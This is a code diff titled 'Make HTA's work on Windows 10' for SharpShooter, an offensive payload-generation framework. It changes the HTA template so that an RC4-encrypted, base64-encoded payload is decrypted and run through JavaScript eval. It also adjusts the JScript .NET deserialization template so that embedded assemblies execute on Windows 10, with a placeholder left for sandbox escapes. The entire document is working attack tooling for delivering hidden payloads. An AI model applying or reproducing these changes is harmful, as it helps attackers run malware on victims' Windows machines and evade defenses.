Make HTA's work on Windows 10

sharpshooter-hta.diff

diff --git a/SharpShooter.py b/SharpShooter.py
index 9b10de1..50cece0 100644
--- a/SharpShooter.py
+++ b/SharpShooter.py
@@ -286,7 +286,7 @@ End Sub"""
                 raise Exception
 
             if(payload_type == 1):
-                if(args.comtechnique):
+                if(args.comtechnique or args.dotnetver == str(4)):
                     template_body = self.read_file(template_base + "js")
                 else:
                     template_body = self.read_file(template_base + "vbs")
diff --git a/templates/harness.hta b/templates/harness.hta
index abba129..87819b8 100644
--- a/templates/harness.hta
+++ b/templates/harness.hta
@@ -41,9 +41,9 @@ var b64block = "%B64PAYLOAD%";
 var decoded = decodeBase64(b64block);
 var plain = rc4(%KEY%, decoded);
 </script>
-<script language="vbscript" >
-Execute plain
-self.close
+<script language="javascript" >
+	eval(plain);
+	self.close();
 </script>
 </body>
 </html>
\ No newline at end of file
diff --git a/templates/stagelessv4.js b/templates/stagelessv4.js
index 6c56603..c5c6660 100644
--- a/templates/stagelessv4.js
+++ b/templates/stagelessv4.js
@@ -233,9 +233,8 @@ try {
 	var stm = base64ToStream(serialized_obj);
 	var fmt = new ActiveXObject('System.Runtime.Serialization.Formatters.Binary.BinaryFormatter');
 	var al = new ActiveXObject('System.Collections.ArrayList');
-	var n = fmt.SurrogateSelector;
 	var d = fmt.Deserialize_2(stm);
-	al.Add(n);
+	al.Add(undefined);
 	var o = d.DynamicInvoke(al.ToArray()).CreateInstance(entry_class);
 	
 %SANDBOX_ESCAPES%